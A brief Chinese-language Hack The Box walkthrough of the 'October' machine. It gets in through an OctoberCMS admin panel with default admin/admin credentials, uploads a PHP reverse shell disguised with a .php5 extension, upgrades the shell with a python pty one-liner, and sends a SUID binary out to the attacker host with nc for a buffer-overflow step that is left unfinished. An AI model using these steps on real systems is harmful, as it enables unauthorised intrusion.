htb-machines-October
作者:互联网
信息收集
端口
网页
网页有写是OctoberCMS,可以查询有无版本漏洞
msf
msf一把梭,找到版本漏洞,并且可以打
虽然可以打,但是这个返回的shell没什么权限,也不能用python再弹个shell,whoami的命令都执行不了,果断放弃,看看文档在哪上传的,自己上传马
getshell
后台路径/backend
管理员弱口令,admin/admin
可以上传一个php反弹shell的文件,改个后缀名php5即可
成功反弹shell,www-data权限
在/home/harry/user.txt中找到user的flag
提权
先获取下pyt
python -c 'import pty; pty.spawn("/bin/bash")'
再把文件pull下来看看
靶机:nc 10.10.14.2 6666 < /usr/local/bin/ovrflw
攻击机:nc -lvnp 6666 > over
缓冲区溢出,具体是啥咱也不懂。。。给pwn
标签:shell,htb,python,xb7,ovrflw,October,pty,上传,machines 来源: https://www.cnblogs.com/karsa/p/14352436.html